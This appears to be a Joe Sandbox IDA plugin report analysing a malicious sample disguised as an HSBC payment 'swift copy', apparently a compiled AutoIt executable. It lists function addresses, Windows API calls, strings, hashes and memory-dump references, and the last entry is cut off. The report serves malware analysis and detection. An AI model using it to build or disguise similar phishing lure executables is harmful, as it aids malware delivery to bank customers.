Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 0713b40d6d4440baa9cf13e4a6941a3ecf7fe21540de260be5b18b22555e8e8b
Instruction ID: d25c6275944368457e24487e2adeb6bcdade0edae54b92ed37f48e78fc4e7c11
Opcode Fuzzy Hash: 0713b40d6d4440baa9cf13e4a6941a3ecf7fe21540de260be5b18b22555e8e8b
Instruction Fuzzy Hash: 15411BB4A05209EFDB18CF68C981BDABBB5FF49300F10416AE904EB351D774A951CFA0

Function 007A6A63 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 007A6B17
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 007A6B53

Strings

static, xrefs: 007A6AB3

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: aae456290eb135274503474a8f3313fef4fcc75277e52540f1c7c57443f88c1c
Instruction ID: 19aa2b7b48c354df9dc03a88025d6096e2f614482b9bda1c3ba51fd3b4cf8176
Opcode Fuzzy Hash: aae456290eb135274503474a8f3313fef4fcc75277e52540f1c7c57443f88c1c
Instruction Fuzzy Hash: 0931A1B1200604AEDB109F74CC80BFB73A9FF89760F148619F9A5D7190DA38AC91CB60

Function 007828A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00782911
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0078294C

Strings

0, xrefs: 0078290A

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: d1e88b4ea694fdb153e9335b3783c87b1d121d5ae8d6175a7e78442447bd8c99
Instruction ID: 1289deaa55fd48f9c25e4211e06dd76aff60528ffe62270e8646a7f96d3051d8
Opcode Fuzzy Hash: d1e88b4ea694fdb153e9335b3783c87b1d121d5ae8d6175a7e78442447bd8c99
Instruction Fuzzy Hash: 66312531A40305EFEF24EF59C885BAEBBB8EF05351F140029ED81B61A2D778A942CB51

Function 007A66D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 007A6761
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007A676C

Strings

Combobox, xrefs: 007A672E

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: d5e766b9b305d143223cdc9d2fa2043d10d53325206cb09057023462734722ed
Instruction ID: 49630193d619d362783adebd0a123c724848b9fe4e2737d21115a44676d50dc2
Opcode Fuzzy Hash: d5e766b9b305d143223cdc9d2fa2043d10d53325206cb09057023462734722ed
Instruction Fuzzy Hash: 7E11C4B5310208AFEF11DF64CC84EBB376AEBDA368F154229F91497290D639DC9187A0

Function 007A6C07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 00721D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00721D73
Part of subcall function 00721D35: GetStockObject.GDI32(00000011), ref: 00721D87
Part of subcall function 00721D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00721D91

GetWindowRect.USER32(00000000,?), ref: 007A6C71
GetSysColor.USER32(00000012), ref: 007A6C8B

Strings

static, xrefs: 007A6C4E

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 7e9c026e53ac076c8315b1cc4db386f5780471d255f9f49ba7bceb9399fae7c1
Instruction ID: 7d6c58eb5ed8f3862b494d75e15f8433e90fe684431eea53e3fa269f1c962f76
Opcode Fuzzy Hash: 7e9c026e53ac076c8315b1cc4db386f5780471d255f9f49ba7bceb9399fae7c1
Instruction Fuzzy Hash: 65215672A10219AFDF04DFB8CC45AEA7BA9FB49314F044A28F995D2250D639E860DB60

Function 007A6920 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 007A69A2
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 007A69B1

Strings

edit, xrefs: 007A6986

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: 5496b47fa8df8033287cfb9f5497658f5bfa187c2612a7a9c4c0c3ba6eda1f82
Instruction ID: e4fa693dff9780c740333877d4e3ed9b625d399380c2e5b87fbbae475b47248b
Opcode Fuzzy Hash: 5496b47fa8df8033287cfb9f5497658f5bfa187c2612a7a9c4c0c3ba6eda1f82
Instruction Fuzzy Hash: BA118C71500208AFEB108E74DC44AEB37A9EB96378F544728F9A5971E0C739EC519B60

Function 007829AF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00782A22
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00782A41

Strings

0, xrefs: 00782A18

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 4d1a3acb7280bcccf51c7597e5afc4b5d64bff13f5920c199692b182fa3ed710
Instruction ID: 44b414358cf5865259c5bdb2c957fdde11b96e85806164e7eef4a68ee01e376d
Opcode Fuzzy Hash: 4d1a3acb7280bcccf51c7597e5afc4b5d64bff13f5920c199692b182fa3ed710
Instruction Fuzzy Hash: 7811D336941118EBCB38EA98D944B9A77A8AF45315F04C021EC55E7292D738AD07C792

Function 007921D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0079222C
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00792255

Strings

<local>, xrefs: 0079221D

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 281943512b1b8c13a63382e6ac95fe840c6a97ac7c46114ec9d48b819c37723a
Instruction ID: 6ffacab100a9b66250f446069726553364808c757f1504124de5dacda544ff72
Opcode Fuzzy Hash: 281943512b1b8c13a63382e6ac95fe840c6a97ac7c46114ec9d48b819c37723a
Instruction Fuzzy Hash: 59112570541225FADF28AF51AC85EFBFBACFF06751F10822AFA0446001D3785892D6F0

Function 0073092D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00723C14,007E52F8,?,?,?), ref: 0073096E

Part of subcall function 00727BCC: _memmove.LIBCMT ref: 00727C06

_wcscat.LIBCMT ref: 00764CB7

Strings

S~, xrefs: 007309AE

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: FullNamePath_memmove_wcscat
String ID: S~
API String ID: 257928180-3256534576
Opcode ID: edd16496d48d66f23ecb0ebaff2b8be9d3b30bcb69b370733315cd8773a0a342
Instruction ID: 14bf19affe80a8a59cc5d59b00a84fdaa99791a142808c9b6cc70fdca9051a92
Opcode Fuzzy Hash: edd16496d48d66f23ecb0ebaff2b8be9d3b30bcb69b370733315cd8773a0a342
Instruction Fuzzy Hash: A211E530A0220CDB9B00EBA0D809FCD73A8AF08355F0044A5B984D3282EAB8A6848B50

Function 00778E05 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00727DE1: _memmove.LIBCMT ref: 00727E22

Part of subcall function 0077AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0077AABC

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00778E73

Strings

ListBox, xrefs: 00778E3D
ComboBox, xrefs: 00778E12

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 0ce1c94066dd38c852e0f2495928a1cf7c8bd6b17bc60921365cc55cec847e8c
Instruction ID: b5e45379bf4f6d476c88296e6a78184e96dc177686c8620fbb5add908ed47e21
Opcode Fuzzy Hash: 0ce1c94066dd38c852e0f2495928a1cf7c8bd6b17bc60921365cc55cec847e8c
Instruction Fuzzy Hash: D201F1B1741228EB9F18EBA0CC49CFE7368EF42360B048A19F869572E1EF395808D751

Function 00788D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00788DAC
__fread_nolock.LIBCMT ref: 00788DC1

Strings

EA06, xrefs: 00788DF3

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: __fread_nolock_memmove
String ID: EA06
API String ID: 1988441806-3962188686
Opcode ID: ce34bc6a125297b40b281fe26dca971c7a111923d1ade9ff3c5e03c2c0c88227
Instruction ID: 2ff66f228347177da54ea76bf76dbd3f6f669195aacfa91f51a7f550c5b428e1
Opcode Fuzzy Hash: ce34bc6a125297b40b281fe26dca971c7a111923d1ade9ff3c5e03c2c0c88227
Instruction Fuzzy Hash: EC01F971944218BFDB58DBA8C81AEFEBBF8DB15311F00419BF552D2281E978A61487A0

Function 00778CFD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00727DE1: _memmove.LIBCMT ref: 00727E22

Part of subcall function 0077AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0077AABC

SendMessageW.USER32(?,00000180,00000000,?), ref: 00778D6B

Strings

ListBox, xrefs: 00778D35
ComboBox, xrefs: 00778D0A

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 01321a0cbf2e9d579ca2368bfe44dc520c5a154e20d3b33d9a329a9f3a6214ec
Instruction ID: 3f081405470ea3af6f17e08e34f04e1e49ee279373764370a55c4ed54a217269
Opcode Fuzzy Hash: 01321a0cbf2e9d579ca2368bfe44dc520c5a154e20d3b33d9a329a9f3a6214ec
Instruction Fuzzy Hash: E501B1B1B81118EBDF28EBA0C95AEFE77A8DF15380F104019B80963291DE295A08D262

Function 00778D82 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00727DE1: _memmove.LIBCMT ref: 00727E22

Part of subcall function 0077AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0077AABC

SendMessageW.USER32(?,00000182,?,00000000), ref: 00778DEE

Strings

ListBox, xrefs: 00778DBA
ComboBox, xrefs: 00778D8F

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 740eb41d92d7df1300d1fe3fcb32916cf8252f5e1a1c0b27cc6b2e528899e505
Instruction ID: f2841016607a9c662c0513e6cb1ea79913cf39c9280fbce7a066d6bc2b108f10
Opcode Fuzzy Hash: 740eb41d92d7df1300d1fe3fcb32916cf8252f5e1a1c0b27cc6b2e528899e505
Instruction Fuzzy Hash: 2B01F7B1B81118F7DF29E6A4C94AEFE77ACCF16340F108016B80963291DE2D5E08D272

Function 0077C4EB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0077C534

Part of subcall function 0077C816: _memmove.LIBCMT ref: 0077C860
Part of subcall function 0077C816: VariantInit.OLEAUT32(00000000), ref: 0077C882
Part of subcall function 0077C816: VariantCopy.OLEAUT32(00000000,?), ref: 0077C88C

VariantClear.OLEAUT32(?), ref: 0077C556

Strings

d}}, xrefs: 0077C517

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: Variant$Init$ClearCopy_memmove
String ID: d}}
API String ID: 2932060187-79343828
Opcode ID: 73ea7cc17b19c8777b486cbde763d63de049a262c2921480d8a4ffe7da84786f
Instruction ID: 776421ddc41248e48063515827a872e28f77e710f9ca454e97c89e423b82eab1
Opcode Fuzzy Hash: 73ea7cc17b19c8777b486cbde763d63de049a262c2921480d8a4ffe7da84786f
Instruction Fuzzy Hash: 88111E719007089FCB10DFAAD88489AF7F8FF18350B50862FE58AD7611E775AA44CF90

Function 00784F28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00784F46
_wcscmp.LIBCMT ref: 00784F58

Strings

#32770, xrefs: 00784F52

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: 71e611f0c3320fd4d7eea13eccdb1d22d6a5b0129120f36f52b8c3a41e2cda4f
Instruction ID: 13348278247f882e837cfdaf558a959e0d48122601f1189fde335a238934bb1d
Opcode Fuzzy Hash: 71e611f0c3320fd4d7eea13eccdb1d22d6a5b0129120f36f52b8c3a41e2cda4f
Instruction Fuzzy Hash: DCE068326002282BE320ABA9AC49FA7F7BCEB95B70F00002BFD04D3040DA649A1187E0

Function 0075B2C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 0075B314: _memset.LIBCMT ref: 0075B321

Part of subcall function 00740940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0075B2F0,?,?,?,0072100A), ref: 00740945

IsDebuggerPresent.KERNEL32(?,?,?,0072100A), ref: 0075B2F4
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0072100A), ref: 0075B303

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0075B2FE

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3158253471-631824599
Opcode ID: 85d62b273589c8dd4f5ad9b9c722935b3dc53009663a350b624afa2a671318a3
Instruction ID: f47f5b126c4ed4b9b15e82e40918601c0a48e131faa7ca4b2ca7cfd240437820
Opcode Fuzzy Hash: 85d62b273589c8dd4f5ad9b9c722935b3dc53009663a350b624afa2a671318a3
Instruction Fuzzy Hash: 91E0C9B02007518AD7209F68E5087967BE8FF44715F008A6DE856D6652E7FCA449CBA1

Function 00777C74 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00777C82

Part of subcall function 00743358: _doexit.LIBCMT ref: 00743362

Strings

Error allocating memory., xrefs: 00777C7B
AutoIt, xrefs: 00777C76

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: Message_doexit
String ID: AutoIt$Error allocating memory.
API String ID: 1993061046-4017498283
Opcode ID: dec2c576fad20a076700a7df9220bb983fbc71d0cc14d4efcf3366429354b79b
Instruction ID: 716f79ec58966392be617fa0599464ad71792dc5f9e4cf816298a17c89fda256
Opcode Fuzzy Hash: dec2c576fad20a076700a7df9220bb983fbc71d0cc14d4efcf3366429354b79b
Instruction Fuzzy Hash: 8DD05B323C432876D11532B56D0BFCA7D484F15B52F044866FB0C595D38AED459081F9

Function 00761935 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?), ref: 00761775

Part of subcall function 0079BFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,0076195E,?), ref: 0079BFFE
Part of subcall function 0079BFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0079C010

FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0076196D

Strings

WIN_XPe, xrefs: 00761788

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: Library$AddressDirectoryFreeLoadProcSystem
String ID: WIN_XPe
API String ID: 582185067-3257408948
Opcode ID: 3edf571bde32716c041d56d295323564bd27dbb1b7c655b4a2638859bc2795dd
Instruction ID: 1e6873b4c8943e3a21fe24ab3881b3f248318f06f3413ea793dd856ae03ca168
Opcode Fuzzy Hash: 3edf571bde32716c041d56d295323564bd27dbb1b7c655b4a2638859bc2795dd
Instruction Fuzzy Hash: 08F0E571801109DFDB15DBA1DAC8AECBBF8BB58301FA84095E503A70A0D7799F84DF64

Function 007A5964 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 007A596E
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 007A5981

Part of subcall function 00785244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 007852BC

Strings

Shell_TrayWnd, xrefs: 007A5967

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
